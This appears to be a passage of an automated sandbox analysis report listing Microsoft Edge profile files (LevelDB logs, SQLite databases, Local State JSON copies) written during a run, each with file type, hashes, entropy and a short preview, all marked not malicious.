Preview:	2024/09/01-00:28:30.710 211c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/09/01-00:28:30.711 211c Recovering log #3.2024/09/01-00:28:30.711 211c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old~RF3c3de.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.129094675867384
Encrypted:	false
SSDEEP:	6:PIMrXzM+q2P923oH+TcwtpIFUt82IMoKZmw+2IMoVMVkwO923oH+Tcwta/WLJ:PIMrQ+v4YebmFUt82IMH/+2IMnV5LYev
MD5:	09F75DA6826BB49AC2DCFE4D48B753B7
SHA1:	393CD419176B0B5F9C9F5BE2A95BC5EBB5A9D567
SHA-256:	512FDD4F3C3ED64F32AF4B263FEF30A46B30E0F31BD166801512CFFDDF5B0BB9
SHA-512:	6B12B02821AC0B090FA4ABFA3CFF9998C08BA1FD08C1CD3FC33D88EADDAB971B0CB32432779E1E77EC3B4B050D15546ED2984E5A78FB0498EC173753A13CD11B
Malicious:	false
Preview:	2024/09/01-00:28:30.710 211c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/09/01-00:28:30.711 211c Recovering log #3.2024/09/01-00:28:30.711 211c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1222265434157146
Encrypted:	false
SSDEEP:	384:b2qOB1nxCkUSAELyKOMq+8yC8F/YfU5m+OlT:Kq+n0P9ELyKOMq+8y9/Ow
MD5:	78492CFCDC61F1EABBB6727C0BC430FD
SHA1:	22ACBB15E78E667217AF2AE4910A368573A51578
SHA-256:	EA62F784AD7D30E3A05E6A7EA5715645616B9B32AAB66332A0C1CF1F166C07B9
SHA-512:	409A1D45956111227D063A414A5A986102976D96208607895D4F099490CAA4132AE86ECB1FA568B16DD9251E8B73BEDD4C88A493B8F454E5829F56CB8E902C16
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fca11334-f9a9-4b22-b8a7-c53bf0ce23c8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.4108834313259155
Encrypted:	false
SSDEEP:	24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8e+ZcI5fc:TnUYVAKAFXX+CcEc
MD5:	8593795778EA3EC8221366AA2FBBA867
SHA1:	2F307D4925183EA13E7BE637CB93ECAF2BA9810A
SHA-256:	F3C17873660988454A5A403D047FCE88379D1FE8917A89C98E6EB940F8929C03
SHA-512:	CC86DD61ACEDA6F2927C4C23CBD6D426F2C8CD1DF65E342C76D07153ACBF801F9B297F8EF182097CBABBDE6A49C90AF0E7A38E49AB53DF3FD2EC2D5BC675099A
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.049731726990245535
Encrypted:	false
SSDEEP:	6:Gd0JAmu8jH0JAmu8rtCL9XCChslotGLNl0ml/XoQDeX:zJXsJXQpEjVl/XoQ
MD5:	C54B3D1870E84B11D259971CBC7B34F7
SHA1:	5F3D7D108711BA075CC8DFD4A079363B4F36DADB
SHA-256:	AC3A97348BF70C13B6BA0618708EE0F39FCA5644BAC0D2CD12CD9B5647D18F15
SHA-512:	4A0033E46E0309DC121922D795DC011FF830BA85FA02681A80C1FC1F145820526C328980034B21F20DFE4F83FA15F8D9D7FBB6F85024A614021E73AD24CFEFAD
Malicious:	false
Preview:	..-.....................:Db.W.v..4..}..tT...l...-.....................:Db.W.v..4..}..tT...l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.128889965556444
Encrypted:	false
SSDEEP:	6:PIMpO+q2P923oH+TcwtfrK+IFUt82IMpcPvZmw+2IMpcPvVkwO923oH+TcwtfrUQ:PIMJv4Yeb23FUt82IMyn/+2IMy15LYet
MD5:	2A393C7D64D7FBCF9F1A17EF8C6E94FD
SHA1:	F9F07BA8592E15F360C204F03395BD22A89251AF
SHA-256:	550D720A8094949AD881F86E860AB72C61CC758E8A7BCBF0A12F9AFA228AFAFE
SHA-512:	FA13B5FE7A7EE08CF7E9FD475A4C1034E591AEE06D8D2049F503D086AC2BCABB0B56B58C9FACA5ED668B81FDA8BD798B98780A5234246746C3280458553E80B3
Malicious:	false
Preview:	2024/09/01-00:28:30.889 20b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/09/01-00:28:30.890 20b8 Recovering log #3.2024/09/01-00:28:30.890 20b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.128889965556444
Encrypted:	false
SSDEEP:	6:PIMpO+q2P923oH+TcwtfrK+IFUt82IMpcPvZmw+2IMpcPvVkwO923oH+TcwtfrUQ:PIMJv4Yeb23FUt82IMyn/+2IMy15LYet
MD5:	2A393C7D64D7FBCF9F1A17EF8C6E94FD
SHA1:	F9F07BA8592E15F360C204F03395BD22A89251AF
SHA-256:	550D720A8094949AD881F86E860AB72C61CC758E8A7BCBF0A12F9AFA228AFAFE
SHA-512:	FA13B5FE7A7EE08CF7E9FD475A4C1034E591AEE06D8D2049F503D086AC2BCABB0B56B58C9FACA5ED668B81FDA8BD798B98780A5234246746C3280458553E80B3
Malicious:	false
Preview:	2024/09/01-00:28:30.889 20b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/09/01-00:28:30.890 20b8 Recovering log #3.2024/09/01-00:28:30.890 20b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old~RF3c41c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.128889965556444
Encrypted:	false
SSDEEP:	6:PIMpO+q2P923oH+TcwtfrK+IFUt82IMpcPvZmw+2IMpcPvVkwO923oH+TcwtfrUQ:PIMJv4Yeb23FUt82IMyn/+2IMy15LYet
MD5:	2A393C7D64D7FBCF9F1A17EF8C6E94FD
SHA1:	F9F07BA8592E15F360C204F03395BD22A89251AF
SHA-256:	550D720A8094949AD881F86E860AB72C61CC758E8A7BCBF0A12F9AFA228AFAFE
SHA-512:	FA13B5FE7A7EE08CF7E9FD475A4C1034E591AEE06D8D2049F503D086AC2BCABB0B56B58C9FACA5ED668B81FDA8BD798B98780A5234246746C3280458553E80B3
Malicious:	false
Preview:	2024/09/01-00:28:30.889 20b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/09/01-00:28:30.890 20b8 Recovering log #3.2024/09/01-00:28:30.890 20b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.136353430147476
Encrypted:	false
SSDEEP:	6:PIMpeN+q2P923oH+TcwtfrzAdIFUt82IMpgZZmw+2IMpFVkwO923oH+TcwtfrzId:PIMtv4Yeb9FUt82IMm/+2IMN5LYeb2J
MD5:	FCD0F29D67AC8079C3282E366F0ACF24
SHA1:	D377B88FA23067FBCAC8BBA49D089A8EEAF06457
SHA-256:	6266044459CD7F4B798895A4AF7260F1F12284D2E70FCC5613B7F6E80B2255A1
SHA-512:	A79935A745555A7FDACE70CEC15FADE523F82C3BA09FCAB61B026B0B7CD6AF9B4A8728C925FFB2083FA21ADD87FC4CD497E3C4AA35F503C0EEC34D883F3F8DF0
Malicious:	false
Preview:	2024/09/01-00:28:30.881 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/09/01-00:28:30.883 2118 Recovering log #3.2024/09/01-00:28:30.884 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.136353430147476
Encrypted:	false
SSDEEP:	6:PIMpeN+q2P923oH+TcwtfrzAdIFUt82IMpgZZmw+2IMpFVkwO923oH+TcwtfrzId:PIMtv4Yeb9FUt82IMm/+2IMN5LYeb2J
MD5:	FCD0F29D67AC8079C3282E366F0ACF24
SHA1:	D377B88FA23067FBCAC8BBA49D089A8EEAF06457
SHA-256:	6266044459CD7F4B798895A4AF7260F1F12284D2E70FCC5613B7F6E80B2255A1
SHA-512:	A79935A745555A7FDACE70CEC15FADE523F82C3BA09FCAB61B026B0B7CD6AF9B4A8728C925FFB2083FA21ADD87FC4CD497E3C4AA35F503C0EEC34D883F3F8DF0
Malicious:	false
Preview:	2024/09/01-00:28:30.881 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/09/01-00:28:30.883 2118 Recovering log #3.2024/09/01-00:28:30.884 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old~RF3c3ed.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.136353430147476
Encrypted:	false
SSDEEP:	6:PIMpeN+q2P923oH+TcwtfrzAdIFUt82IMpgZZmw+2IMpFVkwO923oH+TcwtfrzId:PIMtv4Yeb9FUt82IMm/+2IMN5LYeb2J
MD5:	FCD0F29D67AC8079C3282E366F0ACF24
SHA1:	D377B88FA23067FBCAC8BBA49D089A8EEAF06457
SHA-256:	6266044459CD7F4B798895A4AF7260F1F12284D2E70FCC5613B7F6E80B2255A1
SHA-512:	A79935A745555A7FDACE70CEC15FADE523F82C3BA09FCAB61B026B0B7CD6AF9B4A8728C925FFB2083FA21ADD87FC4CD497E3C4AA35F503C0EEC34D883F3F8DF0
Malicious:	false
Preview:	2024/09/01-00:28:30.881 2118 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/09/01-00:28:30.883 2118 Recovering log #3.2024/09/01-00:28:30.884 2118 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a375.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a5a7.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a6b1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c3ce.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c42c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090729405485079
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMGwuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEU6Btbz8hu3VlXr4CRo1
MD5:	D136B83C0F72AC109E58F4D5BB1D4DAF
SHA1:	3E4C7365937F5797567CD1DBE17607A7EF7C21DA
SHA-256:	9706D4E0647DE69899B4149F58E571E631ACA77A7D991B38A3E5871FE90DA9DF
SHA-512:	D036600D52E8C0D1A1B73DAD1017CAA2FC56630680B9C4A6E9816C6C6E7113BE6440362C52537619BE5E3177F7B059BEA6C468064B214CB128A7C0C6A41FF86B
Malicious:	false
